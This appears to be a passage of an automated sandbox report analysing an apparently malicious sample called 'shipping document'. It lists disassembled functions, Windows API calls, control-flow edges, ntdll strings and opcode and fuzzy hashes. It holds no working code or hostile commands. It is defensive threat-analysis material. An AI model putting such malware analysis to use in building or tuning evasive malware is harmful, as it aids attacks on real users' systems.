                                                                                                • Opcode Fuzzy Hash: 95b629c9a65b41e5bc062fcca5d04ce99698d12f9a4ccf190d3b250a2daeb292
                                                                                                • Instruction Fuzzy Hash: F4115C71D4435876D721AA91DC02FEF7B3C8F81B54F00405AFA047B2C2E6B8670287E9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00413B13 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(03F67l1929,00000111,00000000,00000000), ref: 00413B90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_shipping document.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostThread
                                                                                                • String ID: 03F67l1929$03F67l1929
                                                                                                • API String ID: 1836367815-2233601777
                                                                                                • Opcode ID: 8c96d0a6eaf3669ef81e6460d62e9b93022667ffe01e78fba442d25a356eb143
                                                                                                • Instruction ID: d0bf9e8f96df6008eaba9fad14c0b295be92cffc7d5178cf3b482ff2c61ccae8
                                                                                                • Opcode Fuzzy Hash: 8c96d0a6eaf3669ef81e6460d62e9b93022667ffe01e78fba442d25a356eb143
                                                                                                • Instruction Fuzzy Hash: C8012B71E4435876EB20AAA1DC02FDF7B3C9F80754F008019FA047B1C1E6B8570287E5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00413BA9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51threadwindowCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 38 413ba9-413bac 39 413b5d-413b81 call 4243a3 38->39 40 413bae-413bb9 38->40 48 413ba3-413ba8 39->48 49 413b83-413b94 PostThreadMessageW 39->49 42 413bbb-413bbf 40->42 43 413bc1-413bc6 42->43 44 413bdd-413be3 42->44 43->44 46 413bc8-413bcd 43->46 44->42 47 413be5-413be8 44->47 46->44 50 413bcf-413bd6 46->50 49->48 51 413b96-413ba0 49->51 52 413be9-413bec 50->52 53 413bd8-413bdb 50->53 51->48 53->44 53->52
                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(03F67l1929,00000111,00000000,00000000), ref: 00413B90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_shipping document.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostThread
                                                                                                • String ID: 03F67l1929$03F67l1929
                                                                                                • API String ID: 1836367815-2233601777
                                                                                                • Opcode ID: 39821a9f4c1f1f64d0df08412759031c1d845e222baed0de81ee5273787d3843
                                                                                                • Instruction ID: 86894636e5093705f9518700b0563e86c1cbac7dbaa2a6711ec105745d7f2923
                                                                                                • Opcode Fuzzy Hash: 39821a9f4c1f1f64d0df08412759031c1d845e222baed0de81ee5273787d3843
                                                                                                • Instruction Fuzzy Hash: 53016B70E1874C29DB319E648C41FEB77248B45325F04839ED9545B3D3F679AA858748
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0041759F Relevance: 1.6, APIs: 1, Instructions: 54libraryloaderCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 104 41759f-4175a8 105 417569-417571 104->105 106 4175aa-4175ad 104->106 109 417573-417587 LdrLoadDll 105->109 110 41758a-41758d 105->110 107 41754c-417557 106->107 108 4175af-4175d1 106->108 111 41755d-417564 call 42c6a3 107->111 112 417558 call 42e4d3 107->112 109->110 111->105 112->111
                                                                                                APIs
                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417585
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_shipping document.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Load
                                                                                                • String ID:
                                                                                                • API String ID: 2234796835-0
                                                                                                • Opcode ID: 6672ef2a07b6f1e0a3a6d9abd784e4acd9ced5a7df60c78b222e6461e5af3310
                                                                                                • Instruction ID: e4ab9689755640822d63fbe6b505d8e1795a9cb8d0c27696370f5954d4754e63
                                                                                                • Opcode Fuzzy Hash: 6672ef2a07b6f1e0a3a6d9abd784e4acd9ced5a7df60c78b222e6461e5af3310
                                                                                                • Instruction Fuzzy Hash: 510189B190414DBBDB10CBA9EC81BDF7BB0DF85344F00C6AAE5156B142E234D90ACB80
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0042B473 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 137 42b473-42b4b4 call 404a63 call 42c1a3 RtlFreeHeap
                                                                                                APIs
                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8C0F10F9,00000007,00000000,00000004,00000000,00416DF5,000000F4,?,?,?,?,?), ref: 0042B4AF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_shipping document.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FreeHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3298025750-0
                                                                                                • Opcode ID: 322447e254e490848a7dc11d9a36ee804f398e5e1aba80f661298ce8981d67c5
                                                                                                • Instruction ID: 09bd555976cb7fe51c9ae1a51c67be1872cc08368b26c9c2cc2b7ddb60dc44c7
                                                                                                • Opcode Fuzzy Hash: 322447e254e490848a7dc11d9a36ee804f398e5e1aba80f661298ce8981d67c5
                                                                                                • Instruction Fuzzy Hash: 5AE06DB62142047FDA10EE59EC81FEB73ACEFC5710F004019F908A7241C670BA108BB8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0042B423 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 132 42b423-42b467 call 404a63 call 42c1a3 RtlAllocateHeap
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(?,0041DD4B,?,?,00000000,?,0041DD4B,?,?,?), ref: 0042B462
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_shipping document.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 121b79d4969353e6368234b01e7c7ef4be560de81b8639ac67d3c256f8313c30
                                                                                                • Instruction ID: b62c4c16165ce8cc109e7f2f33857a4434384eb5ed26bfb0bfea9a2d7b802c52
                                                                                                • Opcode Fuzzy Hash: 121b79d4969353e6368234b01e7c7ef4be560de81b8639ac67d3c256f8313c30
                                                                                                • Instruction Fuzzy Hash: 33E06DB22002047BDA10EE99DC41FAB73ACEFC9750F00401AF908A7242D670BA118BB9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0042B4C3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 147 42b4c3-42b4fc call 404a63 call 42c1a3 ExitProcess
                                                                                                APIs
                                                                                                • ExitProcess.KERNEL32(?,00000000,?,?,255E1AAB,?,?,255E1AAB), ref: 0042B4F7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_shipping document.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExitProcess
                                                                                                • String ID:
                                                                                                • API String ID: 621844428-0
                                                                                                • Opcode ID: 04604234f2a0b68f427f34f59aba9004207e7b3264d48a7a1756fd21f3996af8
                                                                                                • Instruction ID: 863a66c235e7fd954b78ae36a6c5b66845a375ac7a86da02cded83e73eca7df7
                                                                                                • Opcode Fuzzy Hash: 04604234f2a0b68f427f34f59aba9004207e7b3264d48a7a1756fd21f3996af8
                                                                                                • Instruction Fuzzy Hash: 39E04F752402147BD620EA6ADC41F9BB75CDBC5714F40441AFA1867241C670BA1187E4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 152 17a2c0a-17a2c0f 153 17a2c1f-17a2c26 LdrInitializeThunk 152->153 154 17a2c11-17a2c18 152->154
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 7c84f8781c4c939921ad4cf459bb47c90a7d8b324c1f6a4470c392bd7e688057
                                                                                                • Instruction ID: ebf24570c547a57a26ebac8d950c6402a6f82c2dc456a20f8622a1bc7cbdc180
                                                                                                • Opcode Fuzzy Hash: 7c84f8781c4c939921ad4cf459bb47c90a7d8b324c1f6a4470c392bd7e688057
                                                                                                • Instruction Fuzzy Hash: E1B09B719055C5C5DB11E7644A08717B90477D0701F55C171D2030651F4738C1D1E676
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Function 017E2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-2160512332
                                                                                                • Opcode ID: d75a5674c45220c0ffe02e3ec65813aff759b8ff666ac3c157e44e825267a8e5
                                                                                                • Instruction ID: 356f9e2d915666df62e8e3922176f428c2022355e12a0f4d9115faea1f2d766d
                                                                                                • Opcode Fuzzy Hash: d75a5674c45220c0ffe02e3ec65813aff759b8ff666ac3c157e44e825267a8e5
                                                                                                • Instruction Fuzzy Hash: DF928E71648342AFE721DF28C888B6BF7E9BB88754F04492DFA94D7252D770E844CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01798620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 017D5543
                                                                                                • Critical section address, xrefs: 017D5425, 017D54BC, 017D5534
                                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017D54CE
                                                                                                • undeleted critical section in freed memory, xrefs: 017D542B
                                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017D54E2
                                                                                                • Critical section debug info address, xrefs: 017D541F, 017D552E
                                                                                                • Invalid debug info address of this critical section, xrefs: 017D54B6
                                                                                                • Thread identifier, xrefs: 017D553A
                                                                                                • double initialized or corrupted critical section, xrefs: 017D5508
                                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017D540A, 017D5496, 017D5519
                                                                                                • 8, xrefs: 017D52E3
                                                                                                • corrupted critical section, xrefs: 017D54C2
                                                                                                • Critical section address., xrefs: 017D5502
                                                                                                • Address of the debug info found in the active list., xrefs: 017D54AE, 017D54FA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                • API String ID: 0-2368682639
                                                                                                • Opcode ID: 67261c1b7db1b05092269308a4979c0efcc37419a238a28810ec970902a50359
                                                                                                • Instruction ID: 1174bd016fbd0129abaa715bd6fed3392b3bd819f0127d604eda07dacbd9a134
                                                                                                • Opcode Fuzzy Hash: 67261c1b7db1b05092269308a4979c0efcc37419a238a28810ec970902a50359
                                                                                                • Instruction Fuzzy Hash: 288187B1A4034CEFDB20CF99C845BAEFBB5EB48B14F204159F905BB241D3B5A944CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017929F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017D22E4
                                                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 017D2498
                                                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 017D2409
                                                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017D24C0
                                                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017D25EB
                                                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 017D2506
                                                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 017D2602
                                                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 017D2412
                                                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 017D261F
                                                                                                • @, xrefs: 017D259B
                                                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 017D2624
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                • API String ID: 0-4009184096
                                                                                                • Opcode ID: 0e36266b1c771147f2558b6e956e0245d348ebd7aa5588b70c3e8f82bb0a4ef5
                                                                                                • Instruction ID: b071e93fe7bef3501d38981b2e0378f66e1e679a440366991b52584e35518a1d
                                                                                                • Opcode Fuzzy Hash: 0e36266b1c771147f2558b6e956e0245d348ebd7aa5588b70c3e8f82bb0a4ef5
                                                                                                • Instruction Fuzzy Hash: 9D0270F1D04269ABDF21DB54CC84B99F7B8AF55304F4041DAE609A7242EB309E85CF59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01808B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                • API String ID: 0-2515994595
                                                                                                • Opcode ID: cde76c134788409deea28f60da6d3e6826122b1be6bc78f2edda749a2c17a9b8
                                                                                                • Instruction ID: 44ddaea2652f792729d6fb9ef3c7a9c9086cf6d295bda852d6d6f8f0ed6d2f66
                                                                                                • Opcode Fuzzy Hash: cde76c134788409deea28f60da6d3e6826122b1be6bc78f2edda749a2c17a9b8
                                                                                                • Instruction Fuzzy Hash: 9351A2B19043099FD76ACF188C44BABBBE8EFD5354F144A2DE955C3281E770D684C792
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01810274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                • API String ID: 0-1700792311
                                                                                                • Opcode ID: c7f6924004d20b5cd52600f4aaefa43602c9b7f6498ba8d0b20b08489e4fd455
                                                                                                • Instruction ID: 31c3b30d2bb17bb8f491412ef60274947e6fcb2b775a4c2032c9708f70a9c93a
                                                                                                • Opcode Fuzzy Hash: c7f6924004d20b5cd52600f4aaefa43602c9b7f6498ba8d0b20b08489e4fd455
                                                                                                • Instruction Fuzzy Hash: 1BD1CC72600689DFDB22DF68C854AADFBF5FF4A704F088049F845DB25AD7749A80CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017E89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017E8A67
                                                                                                • VerifierFlags, xrefs: 017E8C50
                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 017E8B8F
                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017E8A3D
                                                                                                • VerifierDlls, xrefs: 017E8CBD
                                                                                                • VerifierDebug, xrefs: 017E8CA5
                                                                                                • HandleTraces, xrefs: 017E8C8F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                • API String ID: 0-3223716464
                                                                                                • Opcode ID: 3ae35f42ecd9106ab052ec209e3a42705a86f488b8a3c21321dcd86e76316da0
                                                                                                • Instruction ID: 253931d1f8f3664a76d646bb342d41c5a9d01da871b519d5de4f9ef9134e6741
                                                                                                • Opcode Fuzzy Hash: 3ae35f42ecd9106ab052ec209e3a42705a86f488b8a3c21321dcd86e76316da0
                                                                                                • Instruction Fuzzy Hash: 6E916772645702EFDB22DF28C888B1AF7E4EB5CB14F440498FA45AB254C770AE04CB93
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017963FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-792281065
                                                                                                • Opcode ID: 2bd579a9ff9a98bc9a3274521ce1c7334b1355781fdda44056d00e40a1b7d728
                                                                                                • Instruction ID: b69da3cfa53c6a53aa2e833611deaa9362956d2748de6e85fbefc36191097654
                                                                                                • Opcode Fuzzy Hash: 2bd579a9ff9a98bc9a3274521ce1c7334b1355781fdda44056d00e40a1b7d728
                                                                                                • Instruction Fuzzy Hash: 35915971B003199BEF35DF68E859BAEFBB1FB40B14F140228FA016B695D7749A01CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0175645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • apphelp.dll, xrefs: 01756496
                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017B99ED
                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017B9A2A
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017B9A11, 017B9A3A
                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017B9A01
                                                                                                • LdrpInitShimEngine, xrefs: 017B99F4, 017B9A07, 017B9A30
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                • API String ID: 0-204845295
                                                                                                • Opcode ID: 1705de9eaaf709b3ea44f834892055741976cc2a8bd282796180c1daebf3eeb6
                                                                                                • Instruction ID: fb5ca0cbca5581d7e87476d7474fa64c5a96dc9589a0ed1a41cd85da80cf5ef8
                                                                                                • Opcode Fuzzy Hash: 1705de9eaaf709b3ea44f834892055741976cc2a8bd282796180c1daebf3eeb6
                                                                                                • Instruction Fuzzy Hash: F951D3B12483059FD720DF24D895BABFBE4FB84748F40091DFA9597165D770EA04CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01792674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 017D2160, 017D219A, 017D21BA
                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 017D2180
                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017D21BF
                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 017D2178
                                                                                                • SXS: %s() passed the empty activation context, xrefs: 017D2165
                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 017D219F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                • API String ID: 0-861424205
                                                                                                • Opcode ID: 73c70a36094fca9fe3e064204744fb246a961b4ee184bda30eeb345f9ebb3bb0
                                                                                                • Instruction ID: 826349c7bf94bfe2c24e1420d59b41faa3d22d937977d4064a94067431828ffa
                                                                                                • Opcode Fuzzy Hash: 73c70a36094fca9fe3e064204744fb246a961b4ee184bda30eeb345f9ebb3bb0
                                                                                                • Instruction Fuzzy Hash: FD313576B4021977FB21AAA99C45F5EFBB8DBA5A50F054059FB04BB202D3709E01C6A1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0179C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 017D81E5
                                                                                                • Loading import redirection DLL: '%wZ', xrefs: 017D8170
                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0179C6C3
                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 017D8181, 017D81F5
                                                                                                • LdrpInitializeImportRedirection, xrefs: 017D8177, 017D81EB
                                                                                                • LdrpInitializeProcess, xrefs: 0179C6C4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                • API String ID: 0-475462383
                                                                                                • Opcode ID: 33eb8513343eeeec3d130432c77e26bb7458822fc049fcbf34cb4ba14b4c7369
                                                                                                • Instruction ID: 661849fa55a503e5e0adb5345bb495e26bb0a3a779269c0acbc6d65e6b61b969
                                                                                                • Opcode Fuzzy Hash: 33eb8513343eeeec3d130432c77e26bb7458822fc049fcbf34cb4ba14b4c7369
                                                                                                • Instruction Fuzzy Hash: 7E31E4B16443469BC724EF29DC4AE1AFBE4EFD4B10F040558F9456B295E620ED08CBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

